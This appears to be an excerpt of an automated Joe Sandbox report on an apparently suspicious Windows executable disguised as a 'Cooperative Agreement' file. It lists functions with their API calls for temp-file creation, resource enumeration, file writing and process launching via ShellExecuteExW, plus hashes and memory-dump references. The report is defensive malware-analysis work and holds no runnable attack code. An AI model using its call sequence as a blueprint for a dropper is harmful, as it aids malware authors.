GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E

Strings

GetLongPathNameW, xrefs: 0040A786
Kernel32.DLL, xrefs: 0040A773

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

Function 0040195B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

Strings

$pA, xrefs: 00401AC8
$pA, xrefs: 00401A20
$pA, xrefs: 00401B2C
$pA, xrefs: 00401A73

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
String ID: $pA$$pA$$pA$$pA
API String ID: 368575804-1531182785
Opcode ID: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
Opcode Fuzzy Hash: f2649a27bc67419c7da43eb2419df5a8acb945f1114a682675cf20ce32d935b4
Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

Function 00401000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040100F
GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035

Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47

Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49

Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691

Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D

Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0

GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A

Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82

Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B

Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370

Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2

ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011A5
HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA

Strings

:pA, xrefs: 0040112D
.pA, xrefs: 00401085

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonControlsDestroyEnumInitLoadModuleResourceTypes
String ID: .pA$:pA
API String ID: 3272620648-1142403416
Opcode ID: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
Opcode Fuzzy Hash: 2cb7c3423d8d5d08e17f4111cb8a79a384b104a5b6fb2f3686e5397f4b8265a8
Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

Function 00403DF3 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02399740,00000000,00000000), ref: 004042FB
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4

Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(02399740,02399740,00002710), ref: 00402C34

Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9

Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02399740,02398D50,00000000,00000000), ref: 00401E8A

PathQuoteSpacesW.SHLWAPI(00000000,00000001,02398DC8,00000000,00000000,00000000,00000000,00000000,02399740,02398D50,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,02398DC8,00000000,00000000,00000000,00000000,00000000,02399740,02398D50), ref: 004044E1

Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02399740), ref: 004054AB
Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Strings

pA, xrefs: 00404090
*pA, xrefs: 004044BE
*pA, xrefs: 0040452C

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
String ID: *pA$*pA$pA
API String ID: 1881381519-978732049
Opcode ID: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
Opcode Fuzzy Hash: bf419ecd053125aa4cc63fae941d4f4937ceb88770c1d79b13fa06698ce42480
Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

Function 0040AAC0 Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A

Function 0040D819 Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

Function 00402022 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 004020A7
GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6

Strings

open, xrefs: 0040207E, 00402083, 0040208B

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CodeExecuteExitProcessShell
String ID: open
API String ID: 1016612177-2758837156
Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

Function 00401B8F Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
Opcode Fuzzy Hash: 6d644cda50eb4bb59354e9275524eabcad73a702f0dc48a96d1c9a3a24c112bc
Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

Function 0040B020 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

Function 0040DEC0 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

Function 0040A6C5 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040A6E3
wcslen.MSVCRT ref: 0040A6F5
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

